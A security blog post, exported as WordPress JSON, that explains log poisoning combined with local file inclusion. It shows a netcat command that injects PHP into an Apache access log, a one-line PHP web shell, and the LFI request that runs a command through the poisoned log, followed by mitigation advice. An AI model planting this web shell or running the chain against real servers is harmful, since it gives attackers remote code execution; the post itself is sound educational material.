{"id":434,"date":"2024-02-03T19:39:54","date_gmt":"2024-02-04T01:39:54","guid":{"rendered":"https:\/\/blog.ishsome.com\/?p=434"},"modified":"2024-04-16T20:54:49","modified_gmt":"2024-04-17T01:54:49","slug":"what-is-log-poisoning","status":"publish","type":"post","link":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/03\/what-is-log-poisoning\/","title":{"rendered":"What Is Log Poisoning?"},"content":{"rendered":"\n<p>Logs are records generated by various software applications, operating systems, and network devices to keep track of events and activities. They are essential for monitoring, troubleshooting, and security analysis. Log poisoning typically refers to malicious activities or techniques aimed at manipulating or contaminating log files in computer systems.<\/p>\n\n\n\n<p>Log poisoning involves attempting to compromise the integrity of these logs by injecting false or misleading information, altering timestamps, or manipulating the content in a way that misleads administrators or security personnel.<\/p>\n\n\n\n<p>Log poisoning can be used as part of a broader attack strategy to cover the tracks of unauthorized access or to create confusion during an investigation. Security measures such as log integrity checks, secure logging practices, and regular monitoring are crucial to detect and prevent log poisoning attempts. <\/p>\n\n\n\n<p>If an attacker can inject logs with malicious code that causes a Local File Inclusion (LFI) vulnerability, it would result in unauthorized Remote Code Execution (RCE), and sensitive data exposure. 
This might lead to a total compromise of the web server or the machine on which the web server is running.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">How Is It Done?<\/mark><\/h3>\n\n\n\n<p>The Log Poisoning technique is particularly stealthy because log files are shared and are a seemingly harmless part of web server operations. In a log poisoning attack, the attacker must first inject malicious PHP code into a log file. This can be done in various ways, such as:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Modifying the user agent with an evil payload <\/li>\n\n\n\n<li>Using NetCat to send a malicious file via URL<\/li>\n\n\n\n<li>Sending a malicious payload as part of the referrer header<\/li>\n<\/ul>\n\n\n\n<p>For example, if an attacker sends a Netcat request to the vulnerable machine containing a\u00a0<a>PHP<\/a>\u00a0code:<\/p>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" 
stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"$ nc 10.10.10.10 80      \n&lt;?php echo phpinfo(); ?&gt;\nHTTP\/1.1 400 Bad Request\nDate: Thu, 23 Nov 2023 05:39:55 GMT\nServer: Apache\/2.4.41 (Ubuntu)\nContent-Length: 335\nConnection: close\nContent-Type: text\/html; charset=iso-8859-1\n\n&lt;!DOCTYPE HTML PUBLIC &quot;-\/\/IETF\/\/DTD HTML 2.0\/\/EN&quot;&gt;\n&lt;html&gt;&lt;head&gt;\n&lt;title&gt;400 Bad Request&lt;\/title&gt;\n&lt;\/head&gt;&lt;body&gt;\n&lt;h1&gt;Bad Request&lt;\/h1&gt;\n&lt;p&gt;Your browser sent a request that this server could not understand.&lt;br \/&gt;\n&lt;\/p&gt;\n&lt;hr&gt;\n&lt;address&gt;Apache\/2.4.41 (Ubuntu) Server at 10.10.10.10.eu-west-1.compute.internal Port 80&lt;\/address&gt;\n&lt;\/body&gt;&lt;\/html&gt;\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nc<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.10<\/span><span style=\"color: #C3E88D\">.10.10<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#F78C6C\">80<\/span><span style=\"color: #BABED8\">      <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;?<\/span><span style=\"color: #BABED8\">php echo <\/span><span style=\"color: #82AAFF\">phpinfo<\/span><span style=\"color: #89DDFF\">();<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">?&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">HTTP\/1.1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">400<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Bad<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Request<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Date:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Thu,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">23<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Nov<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">05<\/span><span style=\"color: #C3E88D\">:39:55<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">GMT<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Server:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Apache\/2.4.41<\/span><span style=\"color: #BABED8\"> (Ubuntu)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Content-Length:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">335<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Connection:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">close<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Content-Type:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#C3E88D\">text\/html<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> charset<\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #C3E88D\">iso-8859-1<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;!<\/span><span style=\"color: #FFCB6B\">DOCTYPE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HTML<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">PUBLIC<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">-\/\/IETF\/\/DTD HTML 2.0\/\/EN<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">html&gt;&lt;head<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">title<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">400 Bad Request<\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">\/title<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">\/head&gt;&lt;body<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">h<\/span><span style=\"color: #89DDFF\">1&gt;<\/span><span style=\"color: #BABED8\">Bad Request<\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">\/h<\/span><span style=\"color: #89DDFF\">1&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">p<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">Your browser 
sent a request that this server could not understand.<\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">br \/<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">\/p<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">hr<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">address<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">Apache\/2.4.41 <\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">Ubuntu<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\"> Server at 10.10.10.10.eu-west-1.compute.internal Port <\/span><span style=\"color: #89DDFF\">80&lt;<\/span><span style=\"color: #BABED8\">\/address<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">\/body&gt;&lt;\/html<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:19px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>Instead of just using the php code that just displays phpInfo page, an attacker can use a web shell instead which would give him RCE.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>An example of a web shell code can be seen below:<\/p>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" 
style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#282A36\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"&lt;?php system($_GET[&quot;cmd&quot;]); ?&gt;\" style=\"color:#f6f6f4;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki dracula-soft\" style=\"background-color: #282A36\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #F286C4\">&lt;?<\/span><span style=\"color: #BF9EEE\">php<\/span><span style=\"color: #F6F6F4\"> <\/span><span style=\"color: #97E1F1\">system<\/span><span style=\"color: #F6F6F4\">($_GET[<\/span><span style=\"color: 
&quot;">
#DEE492\">&quot;<\/span><span style=\"color: #E7EE98\">cmd<\/span><span style=\"color: #DEE492\">&quot;<\/span><span style=\"color: #F6F6F4\">]); <\/span><span style=\"color: #F286C4\">?&gt;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Because the web server records the request as received, the injected code is then stored in the server&#8217;s access log:<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/tryhackme-images.s3.amazonaws.com\/user-uploads\/645b19f5d5848d004ab9c9e2\/room-content\/d9c19f6c916c790bb4fa94e09a5fcaef.png?ssl=1\" alt=\"Apache access log containing the injected PHP code\"\/><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The attacker then uses\u00a0<a>LFI<\/a>\u00a0to include the access log file, supplying the command for the web shell in the\u00a0<code>cmd<\/code>\u00a0parameter:<\/p>\n\n\n\n<p><em><strong><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\"><code>?page=\/var\/log\/apache2\/access.log<\/code>&amp;cmd=id<\/mark><\/strong><\/em><\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>When the log file is included, PHP evaluates the code stored in it and the command is executed on the server:<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/tryhackme-images.s3.amazonaws.com\/user-uploads\/645b19f5d5848d004ab9c9e2\/room-content\/f4a675e26aac4f257dfd24942bcdbd0f.png?ssl=1\" alt=\"Injected PHP code in the web access log has been executed\"\/><\/figure>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark 
style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Mitigation<\/mark><\/h3>\n\n\n\n<p><br>Mitigating log poisoning involves implementing a combination of preventive measures, monitoring practices, and response strategies to ensure the integrity of log files. Here are several recommendations to help mitigate the risk of log poisoning:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Secure Logging Practices:<\/strong>\n<ul class=\"wp-block-list\">\n<li>Use secure logging libraries and frameworks that handle input validation and sanitation to prevent injection attacks.<\/li>\n\n\n\n<li>Validate and sanitize user inputs before logging them to ensure that malicious data cannot manipulate log entries.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Access Control:<\/strong>\n<ul class=\"wp-block-list\">\n<li>Implement strong access controls to restrict unauthorized access to log files.<\/li>\n\n\n\n<li>Limit user privileges, and ensure that only authorized personnel can modify or delete log files.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Encryption:<\/strong>\n<ul class=\"wp-block-list\">\n<li>Encrypt log files or use encrypted channels for log transmission to protect against tampering during storage or transit.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Regular Monitoring:<\/strong>\n<ul class=\"wp-block-list\">\n<li>Establish a routine for monitoring and reviewing log files for suspicious activities or anomalies.<\/li>\n\n\n\n<li>Set up alerts for unusual patterns, unexpected log entries, or unauthorized access to log files.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Log Integrity Checks:<\/strong>\n<ul class=\"wp-block-list\">\n<li>Implement log integrity checks to detect any modifications or inconsistencies in log files.<\/li>\n\n\n\n<li>Hashing or digital signatures can be used to verify the integrity of log entries.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Centralized Logging:<\/strong>\n<ul 
class=\"wp-block-list\">\n<li>Use centralized logging solutions to consolidate logs from different systems.<\/li>\n\n\n\n<li>Centralization can simplify monitoring and analysis, making it easier to detect anomalies across the entire infrastructure.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Timestamp Verification:<\/strong>\n<ul class=\"wp-block-list\">\n<li>Regularly verify and cross-reference timestamps within log files to ensure consistency.<\/li>\n\n\n\n<li>Anomalies in timestamps may indicate tampering or manipulation.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Regular Auditing:<\/strong>\n<ul class=\"wp-block-list\">\n<li>Conduct regular security audits to identify vulnerabilities and address them promptly.<\/li>\n\n\n\n<li>Include log management and monitoring in the audit process to ensure their effectiveness.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Incident Response Plan:<\/strong>\n<ul class=\"wp-block-list\">\n<li>Develop and maintain an incident response plan that includes procedures for handling log-related incidents.<\/li>\n\n\n\n<li>Train staff on how to respond to log poisoning incidents promptly and effectively.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Keep Software Updated:<\/strong>\n<ul class=\"wp-block-list\">\n<li>Ensure that all software, including logging tools and frameworks, is up-to-date with the latest security patches.<\/li>\n\n\n\n<li>Regularly update and patch the operating system and any dependencies.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>User Training and Awareness:<\/strong>\n<ul class=\"wp-block-list\">\n<li>Educate users and administrators about the importance of log security.<\/li>\n\n\n\n<li>Raise awareness about common attack vectors, such as log poisoning, and provide guidance on secure practices.<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n\n\n\n<p>By combining these measures, organizations can significantly reduce the risk of log poisoning and enhance the overall security of their systems. 
It&#8217;s important to adopt a proactive approach to security and regularly reassess and update security practices in response to evolving threats.<\/p>\n\n\n\n<div style=\"height:26px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Conclusion<\/mark><\/h3>\n\n\n\n<p>Log poisoning involves manipulating or injecting false information into log files to mislead or compromise the integrity of the logs. The methods used for log poisoning can vary, and attackers may employ different techniques based on the vulnerabilities or weaknesses present in the target system. By combining the mitigation techniques mentioned above, log poisoning can be prevented.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Logs are records generated by various software applications, operating systems, and network devices to keep track of events and activities. They are essential for monitoring, troubleshooting, and security analysis. Log poisoning typically refers to malicious activities or techniques aimed at manipulating or contaminating log files in computer systems. 
Log poisoning involves attempting to compromise the [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1,49,40,41,12],"tags":[],"class_list":["post-434","post","type-post","status-publish","format-standard","hentry","category-blog","category-ctf","category-local-file-inclusion","category-log-poisoning","category-tryhackme"],"aioseo_notices":[],"featured_image_src":null,"author_info":{"display_name":"ishsome","author_link":"https:\/\/blog.ishsome.com\/index.php\/author\/e5c77740144cd4a8\/"},"jetpack_featured_media_url":"","jetpack-related-posts":[{"id":422,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/","url_meta":{"origin":434,"position":0},"title":"TryHackMe: Kitty","author":"ishsome","date":"February 5, 2024","format":false,"excerpt":"Kitty from TryHackMe is a Linux machine running a web application with security vulnerabilities. We are tasked with finding the vulnerabilities and exploiting them to gain root privileges on the machine. NMAP We have only two ports open 22 for SSH and HTTP port 80. 
\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Linux-Boxes\/Kitty] \u2514\u2500$ nmap -p22,80 10.10.113.181\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":638,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/06\/15\/palo-alto-firewall-initial-configuration\/","url_meta":{"origin":434,"position":1},"title":"Palo Alto Firewall: Initial Configuration","author":"ishsome","date":"June 15, 2024","format":false,"excerpt":"Embarking on the path to becoming a Network Security Engineer or already a seasoned Network Engineer interested in mastering Palo Alto firewalls? You've come to the right place. 
In this blog, we delve into the essential steps of configuring a Palo Alto firewall in EVE-NG, focusing on the initial setup.\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/06\/image-22.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/06\/image-22.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/06\/image-22.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/06\/image-22.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":447,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/","url_meta":{"origin":434,"position":2},"title":"TryHackMe: Red Team Capstone Challenge","author":"ishsome","date":"February 18, 2024","format":false,"excerpt":"The Red Team Capstone challenge from TryHackMe is an in-depth network challenge simulating a Red Teaming engagement. 
The challenge includes several phases structured around the cyber kill chain that will require you to enumerate a perimeter, breach the organization, perform lateral movement, and finally perform goal execution to show impact.\u2026","rel":"","context":"In &quot;Active Directory&quot;","block_context":{"text":"Active Directory","link":"https:\/\/blog.ishsome.com\/index.php\/category\/active-directory\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":306,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/27\/http-request-smuggling\/","url_meta":{"origin":434,"position":3},"title":"HTTP Request Smuggling","author":"ishsome","date":"January 27, 2024","format":false,"excerpt":"This blog is based on the HHTP Request Smuggling room from TryHackMe. What is HTTP Request Smuggling? HTTP Request Smuggling is a vulnerability that arises when there are mismatches in different web infrastructure components. This includes proxies, load balancers, and servers that interpret the boundaries of HTTP requests. 
Request splitting\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=1050%2C600&ssl=1 3x"},"classes":[]},{"id":414,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/01\/gitlab-cve-2023-7028\/","url_meta":{"origin":434,"position":4},"title":"GitLab CVE-2023-7028","author":"ishsome","date":"February 1, 2024","format":false,"excerpt":"This blog is based on TryHackMe's room on GitLab CVE-2023-7028. Learning Objectives Exploit a GitLab CE instance through CVE 2023-7028 How the exploit works Protection and mitigation measures What is GitLab? 
GitLab is a renowned and widely adopted web-based repository manager that provides a comprehensive platform for source code management,\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":103,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/","url_meta":{"origin":434,"position":5},"title":"TryHackMe: Umbrella","author":"ishsome","date":"January 24, 2024","format":false,"excerpt":"Umbrella from TryHackMe is a Linux machine with multiple misconfigurations. To get a foothold, we need to perform enumeration on the Docker Registry and obtain credentials for the MySQL database. 
